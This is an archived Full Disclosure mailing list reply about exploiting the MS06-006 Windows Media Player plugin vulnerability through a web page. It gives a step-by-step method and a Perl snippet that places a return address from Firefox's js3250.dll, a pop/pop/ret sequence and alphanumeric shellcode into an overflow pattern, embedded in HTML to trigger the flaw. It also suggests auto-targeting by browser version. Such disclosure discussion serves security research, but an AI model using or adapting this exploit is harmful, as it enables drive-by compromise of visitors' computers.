Full Disclosure mailing list archives
Re: MS06-06 Windows Media Player Exploitation
From: H D Moore <fdlist () digitaloffense net>
Date: Thu, 16 Feb 2006 17:23:23 -0600
Still getting some annoying crashes (SEH trick in alphanum code is annoying when you are trying to debug something...), but the basic solution is: 1) Use alphanumeric shellcode 2) Use a return address that does not have bytes over 0x7F 3) Use a pop/pop/ret and hop over return w/o restricted bytes my $pattern = Pex::Text::PatternCreate(16384); substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr] substr($pattern, 2090, length($shellcode), $shellcode); $content = "<html><body><embed src=\"$pattern.wmv\"></body></html>"; Return address is from js3250.dlll in Firefox 1.5.0.1, you should auto-target based on the browser version. -HD On Thursday 16 February 2006 16:26, c0ntex wrote:
No exploit, just some basic research - anyone with 100% Ascii win32 shellcode? http://open-security.org/winmedia/index.html -- regards c0ntex _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] Matthew Murphy (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)